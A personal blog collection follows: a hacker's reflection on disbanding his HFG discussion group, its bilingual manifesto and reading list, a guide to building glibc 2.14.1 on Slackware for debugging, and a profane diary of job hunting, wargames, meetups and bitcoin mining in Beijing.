I became a christian in 2004. Then the following years I was reading/learning a lot of stuff about other people's consequence of ideas. In late 2007, after 3 years of thinking, I thought I was still lacking of "aha" ideas. There were more conversations in face-2-face  back then. I sponsored a community to get a group of people together to discussion on some topics. HFG( Hackerfellowship Group) was born in 2007. We have had monthly meeting for 5 years. We also had a lot of discussions on mailinglist. People came and went. A lot of things happened. I tried to build HFG as an organic community but I totally failed. I neglected the most important factor in the organic community: People must already have organic life, hacker's life. I expected HFG could have the spirit of underground community but it never did. Because these guys I was hacking with who were not hackers even didn't understand what hacker ethic is. Nalaginrut/fU9ANg/口水猫/....you are not fucking hackers!  How could people get used to talking about hacker ethic without any experience of underground scenes? Indeed, I was inspired by Phrack. That's why I ended HFG in my life journey. I'm becoming more like a security guy but not as a generic hacker. I shut down the mailing list and set it open for public. Someday in the future, will I be back? I don't know. Anything is possible if I really want to.

Don't give me wrong. Some of former HFG members are still my good friends. Unfortunately, only friends without brotherhood tag. I built my own fundamentally structure of philosophy with the experiences in HFG. Unfortunately again, it was only my philosophy, it always be. I finally decided to release the latest version of HFG manifesto on my blog last month. I hope it could help people who are struggling with sort of philosophic ideas. But I'm not sure if it really could be helpful. I just do what I should do. I know people would like to hear a happy ending. I'm so sorry, did I fuck your mind again? You fuc*ing tell me...

btw: Internet is a incredible system. No one gives a shit about who you are or what you believed in internet. What internet care is only about ideas. V is right about the ideas are immortality. No one can destroy the ideas.
-----------------------------------------------------------------------------------------------------
HFG( Hackerfellowship Group) manifesto alpha-end revised version

what is Fellowship?
In ancient Greece, the fellowship means a group of guys who are hacking together for achieving the same goal. The HackerFellowship will get hackers together for conversation/sharing/hacking. Hackers are always living in the future, and making the definition of the future!


What is our goal?
Hacking, find the truth! Because Hackers want/need truth. Hackers must experience sort of underground scenes. We are trying to build an underground online/offline community to help us digging deeper, which behind the surface. Hacking on 4-layer model of Theo/Philo/Math/Engi with inevitable complexity of this world...


I want to join in, but how?
Wait a min, my dear friend. We wish you could be one of us just like a brother(maybe you are a sister) return home. We all know that choose the strong philosophy is our only option. In the whole eco-system( Sunday school->brotherhood->community->start-up->company->Multi-regional corporation), building a brotherhood is our target. Once you get in, you must share some views/knowledge. Keep that in mind: what we are really concerning it's about your own philosophy, and we need you prove that you have these abilities or background below to contribute:

1, Join in a conversations like a philosopher who lived in ancient Greece.

2, If you are come from computer field, you should have basis computer programming skills either in C(think about the way of Turing Machine) or scheme(think about the way of Lambda calculus). And having the ability to make your own personal world view on computing field.

3, If you are atheist, we only accept those real atheist( like Ray Kurzweil?) who are looking for the truth whatever it costs. If you are not type of them, fuck outta of here.

4, If you are a christian, only the reformed faith(Lutheranism,Calvinist,neo-Calvinist,etc) are welcome in HFG! Because we need a christian who is willing to dedicate to cultural mandate( defined by reformed theology) in his/her hacking field.


Why HFG?
There may be dozen of reasons. We only list some highlighted ones:

1, We are type of people who are following the hacker ethic and focus on the purpose of life. Even we don't know the purpose or our position in this specific era. We are still trying to figure it out.

2, The brotherhood is like the 2nd foundation never existed. Wait...Where the hell is the 1st foundation? Do you get it? Join HFG, which means you have a chance to learn/hack on how to build an underground brotherhood.

3, Not all of us are comes from computer fields. A lot of people did really good job at non-computer field that we called them Generic hacker. Hacker ethic now affecting more places than our thought. We are hackers! We are anonymous! We have different hacking background. But we are sharing the same methodologies.

We suggest you could learn these courses on MIT OCW:
1, Structure and Interpretation of Computer Programs
2, Introduction to Computer Science and Programming( python)
3, Operating System Engineering
4, Computer Language Engineering
5, Practical Programming in C
6, Multicore Programming Primer

Techique topic:
1, Lisp interpreter
2, GNU/Linux
3, Open hardware


Some materials are our friendly arsenal:

------------------------------------------------------------------------------------------
The Holy Bible - SOMEONE
------------------------------------------------------------------------------------------

Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age by Pekka Hiemann
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------

Ideas - Theological philosphy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion - John Cavlin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion -
The trilogy of The Lord of the Rings -
The Protestant Ethic and the Spirit of Capitalism - Max Webber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions - St.Augestine
The Great Philosophers - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics  - Aristotle
Nine Talmudic Readings  - Emmanuel Levinas
Mere Christianity - C. S. Lewis
On the Trinity - St.Augestine
Thoughts - Blaise Pascal
A History of Western Philosophy - Bertrand Russell
On Judaism - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man : A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------

中文版

什么是Fellowship?
在古希腊，Fellowship的意思是一群有着相同目的的聚在一起努力完成一些事情。HFG就是这么一个地方。黑客们永远是活在未来，也是未来的缔造者！


我们的目标?
Hacking, 找到各个领域的真相！因为黑客的内心渴望真相。地下的场景是黑客必备的经历。我们尝试建立一个地下的在线和线下的社区去帮助我们自己更好的挖掘在表面之下 的真相。Hacking整个四层模型(神学/哲学/数学/工程)的过程不可避免的会遭遇世界的复杂性。


加入HFG的要求:
请认真思考加入HFG的动机，HFG就如兄弟会(注:兄弟会不等于酱缸)一般，你必须分享你的思想，因为这样可以碰撞出更多的"aha"，除了抱着分享的态度之外，您还得满足以下条件：

1, 抱着开放式的态度来进行探讨，我们关注你的哲学，而不是道听途说的知识。

2, 如果您来自计算机领域,在技术上至少具有编程经验:C语言基础(图灵机路线) or scheme编程基础(lambda演算路线),并具备构建计算机科学的世界观的能力。

3, 如果你是无神论，我们只接受真正的无神论，因为他们为了探寻真理可以不惜一切代价，如果你属于大众意义上的无神论，请马上滚蛋！

4, 如果你是基督徒，只有归正信仰（路德宗，加尔文主义，etc)是被HFG所接受的，因为他们愿意投身于各个领域的文化使命。


为什么加入HFG？
或许有很多理由，但这里我们只罗列最为重要的一些：

1, 我们是一群努力探寻人生意义和遵循黑客伦理的人。即使我们目前没有搞明白我们存在的意义或者在这个时代性背景下我们的位置，这没关系，我们会搞明白的。

2, 兄弟会就如第二基地一样从来都没存在过，wait...那第一基地在哪里？ 你明白这个隐喻吗？ 加入HFG，至少意味着你可以学习和参与到建立一个地下的兄弟会。

3, 并不是所有人都来自计算机领域。有很多人在非计算机领域也做的非常棒，我们简单称呼他们为Generic Hacker。黑客伦理的影响原超过了我们的想象。我们是黑客！我们是匿名者！我们有不同的hacking经历和背景。但，我们却共享着同样的方法论。


HFG推荐学习的MIT OCW课程：
1,Structure and Interpretation of Computer Programs
2,Introduction to Computer Science and Programming(python)
3,Operating System Engineering
4,Computer Language Engineering
5,Practical Programming in C
6,Multicore Programming Primer


计算机领域的技术话题：
1, Lisp解释器
2, GNU/Linux
3, 开放硬件


参考读物：
------------------------------------------------------------------------------------------
The Holy Bible(圣经) - SOMEONE
------------------------------------------------------------------------------------------

Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age(黑客伦理与信息时代精神) by Pekka Hiemann
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age(黑客与画家:科技时代的思想碰撞) by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------

Ideas - Theological philosphy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion(基督教要义) - John Cavlin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion(精灵宝钻) - John Ronald Reuel Tolkien,
The Trilogy of The Lord of the Rings(魔戒三部曲) - John Ronald Reuel Tolkien
The Protestant Ethic and the Spirit of Capitalism(新教伦理与资本主义精神) - Max Webber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World(思想的结果) - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions(忏悔录) - St.Augestine
The Great Philosophers(大哲学家) - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power(权力意志) - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics  - Aristotle
Nine Talmudic Readings  - Emmanuel Levinas
Mere Christianity(返朴归真) - C. S. Lewis
On the Trinity(论三位一体) - St.Augestine
Thoughts - Blaise Pascal
A History of Western Philosophy(西方哲学史) - Bertrand Russell
On Judaism(论犹太教) - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man : A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle(创业的国度) - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World(失控) - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------

How to compile the glibc-2.14.1 on Slackware 13.37

Note: This article is nothing about build a cross-compiler toolchains. The only reason I need to rebuild the glibc is for hacking the glibc itself, which mean to providing a debugging platform. If you need to build a cross-compiler toolchains( for Play Station III?) , go to openWRT community.

1, download the glibc-2.14.1.

2, Preparation before compiling:

root@sl13:/home/libs/2.14-build# mkdir -p /home/root_shawn/etc
root@sl13:/home/libs/2.14-build# cp /etc/ld.so.conf /home/root_shawn/etc/

3, Decompressing the source code and compiling:

root@sl13:/home/libs# tar jxvf glibc-2.14.1.tar.bz2
root@sl13:/home/libs/2.14-build# ../glibc-2.14.1/configure --prefix=/home/root_shawn --with-tls --enable-add-ons=nptl
root@sl13:/home/libs/2.14-build# make -j 2 && make install

4, Edit some config files:

add "export LIBRARY_PATH=/home/root_shawn/lib:/lib:/usr/lib" to the file /etc/profile

edit the file "/usr/lib/gcc/i486-slackware-linux/4.5.2/specs", and replace "/lib/ld-linux.so.2" with "/home/root_shawn/lib/ld-linux.so.2"

add "/home/root_shawn/lib" to the file /etc/ld.so.conf

root@sl13:/home/libs/2.14-build# ldconfig
root@sl13:/home/libs/2.14-build# source /etc/profile

5, Testing the current version of glibc

hello.c:
------------------------------------------------
#include <stdio.h>
#include <gnu/libc-version.h>
int main ()
{
        printf("%s\n", gnu_get_libc_version ());
        return 0;
}


root@sl13:~# gcc hello.c
root@sl13:~# ./a.out
2.14.1

Bingo, it's already upgrade!

6, Check the linking path

root@sl13:~# readelf -l a.out

Elf file type is EXEC (Executable file)
Entry point 0x8048340
There are 7 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x000e0 0x000e0 R E 0x4
  INTERP         0x000114 0x08048114 0x08048114 0x00023 0x00023 R   0x1
      [Requesting program interpreter: /home/root_shawn/lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x00504 0x00504 R E 0x1000
  LOAD           0x000504 0x08049504 0x08049504 0x00104 0x0010c RW  0x1000
  DYNAMIC        0x000518 0x08049518 0x08049518 0x000c8 0x000c8 RW  0x4
  NOTE           0x000138 0x08048138 0x08048138 0x00020 0x00020 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

 Section to Segment mapping:
  Segment Sections...
   00   
   01     .interp
   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame
   03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
   04     .dynamic
   05     .note.ABI-tag
   06   

[Requesting program interpreter: /home/root_shawn/lib/ld-linux.so.2] --- that's what I want. Shit~ I can debug the fucking glibc now. I'll keep reading the Phrack paper( avoid the stack canary to remote exploit for profit and fun? ) this week. 29% is too far away from my goal/gold.....hmm...maybe emacs's lines counter has some problem @_@

btw: The Architecture wants the Matrix running by the paradigms of  closed system/linear/mechanic/engineering/controlled. The Oracle wants the Matrix becoming a diversity world with infinitely possibility, by following the paradigms of open system/non-linear/biological/evolving/out of control. The matters is depend on your "choice".

Great minds think alike

I came to BJ on May 8th 2012 and I went to a hostel as my temporary live. I was very busy on job interviews in the 1st week. The result was not really good. Some very famous companies in the industry are not pretty as I thought. Almost of them are caring about hiring cheap labors but nothing concerns truely hacking spirit. It's ok. I will not disclosure you montherfuckers here-_- I began to vist friends/communities in the 2nd week. There were so much interesting stuffs I've been experience in the next 2 months. Of course, I'm going to share these disclosure-able part.

Firstly, I was start the io-wargame, which is a learning platform that you can learn and practice your security skills on GNU/Linux. In the 1st 10 days, I was get used to playing with io-wargame on the daylight. When I passed the lvl5, it was beings a little bit of harder. So I need help from irc and I have to follow these experienced hacker's daily online schedule. The midnight( in BJ) is a good start for them. Then I changed my hacking time. Finally, I spent 1 month to passed the lvl10. I will keep on it if I have time in the future. If you ask me about pw( please go asking in irc channel), I will give you my mid-finger. The spoiler is intolerable in smashthestack community.

I went to Open Party Beijing in May. A bunch of speakers gave us wide topics in the seminar, including history, math, startup ideas and other stuff. After the seminar, I went with a other-stuff's speaker for dinner. His name is Philip McMaster. He was a speaker on TEDx Beijing 2011. We discussed a few very serious issues that normal people seems don't care about. How are the banksters robing people's wealth? How is the Protestant ethic evolving to Hacker ethic in the background of information age? How can a normal people find their really needs( correct value) today? How can a young man/woman spend a whole afternoon for shopping the stuff they never really need? How can you say looking for the truth/pupose of ur life is important and you are still willing to spend more than 10 years salary to buy a apartment? Aha, our society is fucking sick. After I introduced the relationship between hacker ethic and information age, Philip was start to using my terminology to keep the conversation continue. Well, I just wanna say, as a old man, He has a open mind and he definitely is a fucking hacker.

I went to BLUG's meeting in June. Jose gave us a free speech about a open hardware project: open-drone. It's very like a quadricopter. I was picturing in my mind( when Jose was talking), add a camera and a wifi device onto the drone. It can fly close to a highrise building and taking photo, or flying around your home and cracking every wifi you searched. And, I met a female security hobbyist who are using BT5, which is the main OS on my laptop. She's name is Kendra. She is a web designer and a artist hacker. It was my honor to met the Lady Back-Track-_-

Another interesting experience was to hangout with a friend. He worked for Qi-hardware. He has been very busy on digging the bitcoins and keeping find the better ways if possible. Bitcoins is the creation of people who are holding the Anarchist-like philosophical ideas. I like the concept of decentralization. Bitcoin is the electronical cash that you can exchange it with others by peer-to-peer ways. How to get bitcoins? You can ask google about it. My answer is simple: Machine's calculations. At the period of beginning of the bitcoin's digging, hacker/people were using CPU. Then they figured out some kind of technique issues to make CPU inefficiency on digging work. Use GPU instead of CPU is a better choice. The matter right now is GPU cost the power too much and FPGA is the way that can fit their needs. See my list below then you will understand:

1000USD's PC with CPU mining: 5Mhash/s
1000USD's PC with GPU mining: 300--400Mhash/s, GPU-part: 100-200W
500USD's FPGA device: 400Mhash/s, only 20-30W

Do the math-_- The qi-hardware shared everything about their experience. If you have interest to be a miner of information version, hack it for urself! I went out with friends/backpackers for watching the soccer match at 11:00 PM. We saw lights from a few highrise buildings when we walked back on the street at 4:20 PM. A guy told us a story: "If you can see there are still lights in the office building after midnight, which mean the monkey coders are OT there. They actually don't work. They are just sitting on their butt until the manager go get to the bitches. They will watch the Japanses pornie movie and begin masturbating...you know the monkey coder's dick is so small that they even can't find their dick very preciesly. The question is why their dick is so small? Becuase they don't write low-level code, which could be healthy for programmer's soul.". Well, this is a fascinating story from underground. Please, keep the secret for me and don't tell it to others-_- I think that differs hacker and monkey coder. I need to transform myself from the monkey-coder to the hacker. It would be a kind of paradigm shift, big ones!

 I got my new job. It's my honor to work for a community-based company. I'll be busting my ass on new hacking in the future. I've already shared the disclosure-able part of my experience of the past 2 months above. I think the 2-month is my vaction for the 7-year hacking of Theo/Philo/Math/Engi models. Praise the L0rd!

May L0rd's hacking spirit guide us!

 btw: Neo didn't kill agent Smith. He just decompiled him and split the code into the fucking random area. That's the point!

before I left home:


Lady Back-Track:
 

Backpackers left their photos on the wall:


LongQuan Buddhism temple in BJ:
 

what a delicious food made by friends
 

I like NetEase. Because they provided servers for Open Course and TED.

 

 EURO CUP 2012. When England VS French began, a french guy sung the national song:

 

 AMD and Intel are so "close"...WTH
 
Don't look at that girl. Keep your eyes on the GNU logo, please...


TsingHua University. This is the only place I like.
 

I bet the combination of cheap x86 hardware and GNU/Linux will beat the other platform in networking device field. Atom 4/5xx with 1.8Ghz dual core machine only cost about 1, 400 RMB:


We went out to bar to watch German VS Greece:
 

Remeber that monkey-coder's story?


By the community, and for the community!